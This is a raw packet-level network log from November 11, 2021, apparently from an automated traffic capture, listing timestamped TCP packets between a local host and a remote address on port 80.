                                                                                                                              Nov 11, 2021 20:35:49.081516981 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081564903 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081593990 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081640959 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081660032 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081667900 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081671953 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081680059 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081708908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081756115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081784964 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081830978 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081860065 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081907988 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081934929 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081973076 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081979990 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081981897 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.082021952 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.082051039 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.082097054 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.082135916 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.082166910 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.082227945 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.083059072 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.098664045 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.098684072 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.098712921 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.098731995 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.098757982 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.098781109 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.098798037 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.098798990 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.098912954 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.098926067 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.098931074 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.098959923 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.098978043 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099006891 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099014997 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.099030018 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099056005 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099080086 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099102974 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.099103928 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099108934 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.099122047 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099149942 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099169016 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099191904 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099217892 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099226952 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.099534035 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099551916 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099580050 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099605083 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099606991 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.099626064 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099644899 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099672079 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099690914 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099694967 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.099714994 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099715948 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.099735975 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099757910 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099781990 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099800110 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099827051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099844933 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099870920 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099889040 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099915981 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099920034 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.099926949 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.099935055 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099957943 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099977016 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.099999905 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100018978 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100047112 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100064993 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100069046 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100092888 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100096941 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100112915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100136995 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100162029 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100178957 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100209951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100212097 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100229025 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100253105 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100263119 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100270033 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100297928 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100317001 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100318909 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100336075 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100342989 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100361109 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100389004 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100435019 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100440979 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100454092 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100476980 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100500107 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100512028 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100529909 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100558996 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100578070 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100581884 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100603104 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100631952 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100653887 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100671053 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100698948 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100718975 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100719929 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100739956 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100759029 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100780964 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100785971 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100788116 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100806952 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100867987 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100887060 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100900888 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100915909 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100934982 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100959063 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.100963116 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.100980997 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101006031 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101022959 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101051092 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101072073 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101102114 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101104021 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101113081 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101120949 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101149082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101166010 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101195097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101212025 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101216078 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101233959 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101260900 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101283073 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101308107 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101327896 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101329088 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101335049 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101346970 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101373911 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101377010 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101396084 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101419926 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101438999 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101466894 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101468086 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101473093 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101485014 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101515055 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101535082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101558924 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101576090 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101603985 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101604939 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101623058 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101653099 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101672888 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101679087 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101692915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101722002 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101739883 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101768017 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101785898 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101810932 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101814032 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101830959 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101855040 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101875067 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101878881 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101900101 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101921082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101944923 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101963043 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.101964951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.101989031 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102011919 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102025986 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102036953 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102054119 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102078915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102101088 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102125883 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102145910 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102148056 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102165937 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102173090 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102194071 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102199078 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102216005 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102238894 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102242947 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102248907 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102257013 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102281094 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102298021 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102325916 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102325916 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102332115 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102344036 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102366924 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102385044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102411985 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102427959 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102456093 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102456093 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102461100 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102474928 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102494001 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102519035 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102535963 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102564096 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102579117 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102606058 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102622986 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102652073 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102658033 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102694035 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102714062 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102737904 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102761030 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102777958 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102807045 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102827072 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102827072 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.102847099 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102866888 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102895975 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102914095 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102936029 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102963924 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.102986097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103003979 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103032112 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103053093 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103054047 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.103072882 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103096962 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103115082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103142977 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103158951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103185892 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103204012 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103230953 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103236914 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.103245020 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.103250027 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103271961 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103287935 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103315115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103332996 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103358984 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103375912 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103403091 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103405952 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.103413105 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.103423119 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103441954 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.103467941 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.104209900 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.106189966 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.106221914 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.120789051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.120812893 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.120867968 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.120898962 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.120919943 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.120950937 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.120971918 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.120985985 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.120996952 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121006966 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.121022940 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121049881 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121069908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121084929 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.121092081 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.121098995 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121119022 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121149063 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121170044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121174097 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.121177912 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.121193886 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121213913 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121237040 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121256113 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121268034 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.121270895 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.121285915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121308088 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121346951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121365070 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121371984 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.121376038 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.121388912 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121411085 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.121437073 CET8049751172.67.196.11192.168.2.3
